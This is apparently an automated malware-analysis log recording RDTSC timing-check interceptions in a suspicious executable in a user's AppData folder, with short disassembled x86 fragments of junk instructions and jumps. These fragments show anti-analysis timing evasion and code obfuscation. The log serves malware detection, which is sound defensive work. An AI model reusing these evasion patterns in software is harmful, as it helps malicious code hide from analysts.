Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 640880 second address: 640891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 jne 00007F95FD7D89AAh 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 640891 second address: 64089C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 65A5BA second address: 65A5CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D89A0h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 65A5CF second address: 65A5EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F95FD07A060h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 65A5EE second address: 65A5F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 65A5F2 second address: 65A614 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F95FD07A056h 0x00000008 jmp 00007F95FD07A068h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 65A614 second address: 65A619 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 6596E9 second address: 65970E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95FD07A066h 0x00000009 jmp 00007F95FD07A05Bh 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 65985C second address: 659860 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 659F06 second address: 659F0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 65A1C9 second address: 65A1CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 65A1CF second address: 65A1D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 65A1D3 second address: 65A1E4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F95FD7D8996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 65BC83 second address: 65BC8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 65E524 second address: 65E52A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 65E52A second address: 65E530 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 65E530 second address: 65E534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 65E876 second address: 65E8AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A05Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F95FD07A05Dh 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F95FD07A065h 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 65E8AB second address: 65E8B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F95FD7D8996h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 661A8B second address: 661A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F95FD07A056h 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 6616A6 second address: 6616B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007F95FD7D8996h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CF0EBF second address: 4CF0EF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F95FD07A065h 0x00000009 xor ax, 50F6h 0x0000000e jmp 00007F95FD07A061h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CF0EF1 second address: 4CF0F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 jmp 00007F95FD7D899Ah 0x0000000e movzx eax, di 0x00000011 popad 0x00000012 mov ebp, esp 0x00000014 pushad 0x00000015 jmp 00007F95FD7D89A3h 0x0000001a pushfd 0x0000001b jmp 00007F95FD7D89A8h 0x00000020 or eax, 155F03A8h 0x00000026 jmp 00007F95FD7D899Bh 0x0000002b popfd 0x0000002c popad 0x0000002d pop ebp 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F95FD7D89A5h 0x00000035 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CF0F62 second address: 4CF0F68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CF0F68 second address: 4CF0F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CF0F6C second address: 4CF0F70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE0C46 second address: 4CE0C4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE0C4C second address: 4CE0C8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A064h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007F95FD07A05Eh 0x00000010 mov ch, 1Ch 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F95FD07A063h 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE0C8D second address: 4CE0C93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE0C93 second address: 4CE0C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE0C97 second address: 4CE0C9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE0C9B second address: 4CE0CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F95FD07A069h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE0CC1 second address: 4CE0CC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE0CC7 second address: 4CE0CCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE0CCD second address: 4CE0CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE0CD1 second address: 4CE0D24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov cx, 7427h 0x0000000f mov dx, si 0x00000012 popad 0x00000013 pop ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov bx, 3596h 0x0000001b pushfd 0x0000001c jmp 00007F95FD07A067h 0x00000021 and cx, 021Eh 0x00000026 jmp 00007F95FD07A069h 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE0D24 second address: 4CE0D34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F95FD7D899Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D30014 second address: 4D3004B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A05Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F95FD07A066h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F95FD07A05Eh 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D3004B second address: 4D30072 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D899Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F95FD7D89A5h 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D30072 second address: 4D30082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F95FD07A05Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D30082 second address: 4D300B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D899Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e call 00007F95FD7D89A4h 0x00000013 mov si, 1271h 0x00000017 pop esi 0x00000018 mov eax, edi 0x0000001a popad 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D300B9 second address: 4D300CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A05Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D300CB second address: 4D300D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0111 second address: 4CC0117 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0117 second address: 4CC011B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0199 second address: 4CC01AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 push edx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC01AA second address: 4CC01AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC01AE second address: 4CC01C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A062h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE066B second address: 4CE067A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D899Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE067A second address: 4CE0704 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 mov eax, 5179AE57h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F95FD07A05Ah 0x00000014 push eax 0x00000015 pushad 0x00000016 call 00007F95FD07A061h 0x0000001b pushad 0x0000001c popad 0x0000001d pop esi 0x0000001e jmp 00007F95FD07A067h 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 jmp 00007F95FD07A066h 0x0000002a mov ebp, esp 0x0000002c jmp 00007F95FD07A060h 0x00000031 pop ebp 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F95FD07A067h 0x00000039 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE0704 second address: 4CE070A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE070A second address: 4CE070E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE05A6 second address: 4CE05AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE05AA second address: 4CE05C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A062h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE05C0 second address: 4CE05D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F95FD7D899Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE05D2 second address: 4CE05D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE02DF second address: 4CE02E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE02E4 second address: 4CE0305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bl, 5Eh 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F95FD07A065h 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CF01B9 second address: 4CF01DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F95FD7D89A5h 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D20F0B second address: 4D20F1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F95FD07A05Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D20F1D second address: 4D20F4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F95FD7D899Dh 0x00000011 jmp 00007F95FD7D899Bh 0x00000016 popfd 0x00000017 movzx eax, bx 0x0000001a popad 0x0000001b pop ebp 0x0000001c pushad 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D002CC second address: 4D00300 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F95FD07A069h 0x00000008 jmp 00007F95FD07A05Bh 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov ch, EFh 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D00300 second address: 4D00304 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D00304 second address: 4D00320 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A068h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D00320 second address: 4D003A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 68DF5A94h 0x00000008 mov ecx, ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F95FD7D89A5h 0x00000016 or ch, 00000006h 0x00000019 jmp 00007F95FD7D89A1h 0x0000001e popfd 0x0000001f popad 0x00000020 mov eax, dword ptr [ebp+08h] 0x00000023 pushad 0x00000024 jmp 00007F95FD7D89A8h 0x00000029 jmp 00007F95FD7D89A2h 0x0000002e popad 0x0000002f and dword ptr [eax], 00000000h 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F95FD7D89A7h 0x00000039 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE0443 second address: 4CE0460 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A069h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE0460 second address: 4CE0470 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F95FD7D899Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE0470 second address: 4CE04D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F95FD07A069h 0x00000012 add ax, 5B56h 0x00000017 jmp 00007F95FD07A061h 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F95FD07A060h 0x00000023 or si, FD78h 0x00000028 jmp 00007F95FD07A05Bh 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE04D0 second address: 4CE04D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE04D6 second address: 4CE052E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A05Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e pushad 0x0000000f mov dx, si 0x00000012 pushad 0x00000013 call 00007F95FD07A05Eh 0x00000018 pop eax 0x00000019 push edi 0x0000001a pop esi 0x0000001b popad 0x0000001c popad 0x0000001d mov ebp, esp 0x0000001f jmp 00007F95FD07A05Dh 0x00000024 pop ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F95FD07A068h 0x0000002e rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE052E second address: 4CE0532 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE0532 second address: 4CE0538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CF0DA9 second address: 4CF0E36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F95FD7D899Fh 0x00000009 jmp 00007F95FD7D89A3h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007F95FD7D89A8h 0x00000015 adc si, 7978h 0x0000001a jmp 00007F95FD7D899Bh 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 push eax 0x00000024 pushad 0x00000025 mov cx, bx 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a pushad 0x0000002b mov bx, 313Eh 0x0000002f push eax 0x00000030 push edx 0x00000031 pushfd 0x00000032 jmp 00007F95FD7D89A5h 0x00000037 xor ch, FFFFFFC6h 0x0000003a jmp 00007F95FD7D89A1h 0x0000003f popfd 0x00000040 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D000FF second address: 4D00118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F95FD07A063h 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D00118 second address: 4D0017D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D89A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F95FD7D89A0h 0x0000000f push eax 0x00000010 jmp 00007F95FD7D899Bh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 pushad 0x00000018 mov ah, 9Bh 0x0000001a mov di, ECB2h 0x0000001e popad 0x0000001f mov esi, edx 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 jmp 00007F95FD7D89A5h 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov bh, 77h 0x0000002f movzx eax, dx 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D2073A second address: 4D2073E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D2073E second address: 4D20744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D20744 second address: 4D207A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A064h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007F95FD07A05Eh 0x00000010 mov ax, 3041h 0x00000014 pop eax 0x00000015 push edx 0x00000016 mov bh, ch 0x00000018 pop edi 0x00000019 popad 0x0000001a push eax 0x0000001b jmp 00007F95FD07A065h 0x00000020 xchg eax, ebp 0x00000021 jmp 00007F95FD07A05Eh 0x00000026 mov ebp, esp 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
